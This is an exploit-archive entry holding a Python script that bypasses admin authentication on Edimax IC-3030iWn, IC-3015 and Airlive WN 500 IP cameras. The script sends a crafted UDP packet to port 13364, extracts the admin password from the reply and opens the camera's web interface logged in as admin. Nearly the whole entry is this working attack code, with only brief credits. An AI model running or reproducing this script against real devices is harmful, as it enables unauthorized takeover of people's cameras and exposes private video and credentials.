Edimax IC-3030iWn Web Admin Auth Bypass exploit

2012-06-13T00:00:00
ID 1337DAY-ID-18609
Type zdt
Reporter y3dips
Modified 2012-06-13T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            This exploit against:
 
- Edimax IC-3030i
- Edimax IC-3015
- Airlive WN 500

#!/usr/bin/env python
"""
# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
# Date: 4 April 2012
# Exploit Author: [email protected], @y3dips
# URL: http://echo.or.id
# Vendor Homepage: http://www.edimax.com
# Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91
# Also Tested on:
   - Edimax IC-3015
   - Airlive WN 500
# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
# To successfully automate your browser launch, change browser path.
"""

import socket
import webbrowser
import sys

if len(sys.argv) != 2:
    print "Eg: ./edimaxpwned.py edimax-IP"
    sys.exit(1)

port=13364
target= sys.argv[1]


def read_pw(target, port):
    devmac = "\xff\xff\xff\xff\xff\xff"
    code="\x00\x06\xff\xf9" #for unicast reply
    data=devmac+code
    sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    sock.connect((target,port))
    try:
        sock.send(data)
        sock.settimeout(5)
        tmp = sock.recv(4096)
        return tmp
    except socket.timeout:
        return None

def pwned_edi():
    data=read_pw(target, port)
    if data != None:
        data=data[365:377]
        pw=data.strip("\x00")
        webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp')
    else:
        print "Socket timeOut or not Vulnerable"

pwned_edi()




#  0day.today [2018-01-10]  #